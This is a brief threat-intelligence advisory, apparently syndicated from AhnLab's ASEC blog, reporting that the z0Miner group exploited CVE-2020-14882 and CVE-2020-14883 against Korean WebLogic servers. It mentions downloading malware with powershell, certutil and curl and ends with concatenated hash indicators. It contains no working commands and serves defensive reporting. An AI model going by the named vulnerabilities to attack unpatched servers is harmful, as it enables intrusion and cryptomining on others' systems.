AhnLab Security Intelligence Center (ASEC) has found numerous cases of threat actors attacking vulnerable Korean servers. This post introduces one of the recent cases in which the threat actor ‘z0Miner’ attacked Korean WebLogic servers. z0Miner was first introduced by Tencent Security, a Chinese Internet service provider. These threat actors have a history of distributing miners against vulnerable servers (Atlassian Confluence, Apache ActiveMQ, Log4J, etc.), and they were frequently mentioned in the ASEC blog. Additionally, this threat actor is well-known for using CVE-2020-14882 and CVE-2020-14883 vulnerabilities to attack WebLogic servers. On January 26, 2024, AhnLab found cases in which ‘z0Miner threat actors’ distributed malware to the Korean WebLogic server system. The threat actor’s method to download malicious files differed by the OS system. They used powershell.exe and certutil.exe against Windows and used the curl command against Linux.
Disclaimer: This article is part of X-Force OSINT Advisories’ automated collection to enable faster integration of open-source articles to client environments. All credit and copyright goes to the original authors.
Reference: https://asec.ahnlab.com/en/62564/
Sample Indicators of Compromise:
efc2a705c858ed08a76d20a8f5a11b1b2a0d26b8b02bb2d17994d2a9a38d61db547c02a9b01194a0fcbfef79aaa52e38575575f5b6f9c4f7149ed6d86fb16c0fa0766ad196626f28919c904d2ced6c85
